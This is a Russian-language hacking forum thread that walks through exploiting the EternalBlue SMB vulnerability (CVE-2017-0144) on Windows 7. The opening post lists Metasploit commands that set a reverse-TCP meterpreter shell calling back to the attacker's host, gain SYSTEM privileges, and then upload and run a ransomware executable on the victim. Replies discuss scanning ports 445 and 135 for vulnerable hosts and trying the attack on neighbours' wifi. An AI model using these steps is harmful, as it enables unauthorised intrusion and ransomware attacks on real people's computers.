Загрузка...

EternalBlue - Взлом Windows PC

Тема в разделе Безопасность создана пользователем tigo 28 май 2017. 8547 просмотров

  1. tigo
    tigo Автор темы 28 май 2017 160 10 ноя 2016
    Всем привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.

    [IMG]

    В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.

    Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.

    Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.

    > msfupdate

    [IMG]

    > msfconsole

    > use exploit/windows/smb/ms17_010_eternalblue

    > msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105

    > msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

    > msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

    > msf exploit(ms17_010_eternalblue) >exploit

    [IMG]


    Эксплоит срабатывает на отлично, получаем системные привилегии:

    > getsystem

    > getuid

    [IMG]

    Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)

    [IMG]

    > upload /root/ransomware.exe C:\\

    > shell

    > cd C:\\

    > ransomware.exe

    [IMG]

    И как итог:

    [IMG]

    Вот собственно, и все. Спасибо за внимание.
     
  2. bruteroid
    bruteroid 28 май 2017 16 26 ноя 2016
    Спасибо за мануал! Вопрос следующий,каким образом просканить сеть на наличие уязвимых хостов?
     
  3. bruteroid
    bruteroid 28 май 2017 16 26 ноя 2016
    Если я правильно понял,то нужно сканить на открытый 445 порт,верно?
     
  4. tigo
    tigo Автор темы 28 май 2017 160 10 ноя 2016
    Да и 135 порт тоже.
     
  5. bruteroid
    bruteroid 28 май 2017 16 26 ноя 2016
    Понял,спасибо. Поговаривают,что пробивает олн только Windows 7 x 64?
     
  6. Alex199526
    Alex199526 25 фев 2018 0 18 фев 2018
    а что делать на х32?
     
  7. capture_inactive878414
    capture_inactive878414 30 янв 2019 г.Актау 0 26 янв 2019
    server username: NT AUTHORITY\система как воити user
     
  8. Speadhoom
    Speadhoom 3 фев 2019 Заблокирован(а) 18 7 янв 2019
    Годно! Но применяется только на "соседских wifi", если ты через wifi какой-то компании попробуешь. Нечего не выйдет т.к. там дохуя файрволов и всю сеть по-любому тестировали на данную уязвимость. Чисто по баловаться можно :frog_mm:
     
  9. capture_inactive878414
    capture_inactive878414 12 апр 2019 г.Актау 0 26 янв 2019
    если пользователя есть пароль можно подключится
     
  10. tapocheck
    tapocheck 20 апр 2019 Заблокирован(а) 632 21 июл 2018
    Возьму на заметку
     
Top
Загрузка...